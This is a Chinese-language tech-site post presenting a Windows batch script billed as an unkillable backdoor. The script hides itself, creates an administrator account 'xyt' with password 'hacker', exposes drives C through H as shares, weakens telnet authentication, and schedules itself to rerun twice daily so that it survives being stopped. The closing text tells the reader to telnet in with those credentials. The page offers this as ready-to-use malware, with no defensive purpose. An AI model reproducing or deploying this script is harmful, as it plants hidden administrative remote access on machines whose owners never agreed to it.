当前位置: 移动技术网 > IT编程>网络>Dos/Bat > 批处理bat之永不被杀的后门

批处理bat之永不被杀的后门

2017年12月12日  | 移动技术网IT编程  | 我要评论
代码如下:  
  
复制代码 代码如下:

@echo off  
  @attrib +s + r xyt.bat 
  @net user xyt hacker /add  
  @net localgroup administrators xyt /add  
  @net share c$=c:  
  @net share d$=d: 
  @net share e$=e: 
  @net share f$=f: 
  @net share g$=g: 
  @net share h$=h: 
  @tlntadmn config sec = -ntlm 

  @net stop schedule 
  @net start schedule 
  @echo at 11:00 c:\winnt\system32\log.bat > c:\winnt\system32\xyt.bat  
  @echo at 23:00 c:\winnt\system32\log.bat >> c:\winnt\system32\xyt.bat  
  @at 11:05 c:\winnt\system32\xyt.bat  
  @at 23:05 c:\winnt\system32\xyt.bat  
  @net stop telnet  
  @net start telnet  
  @exit 
 

  这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
  运行后telnet ip上去,用户名为xyt,密码为hacker。

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
移动技术网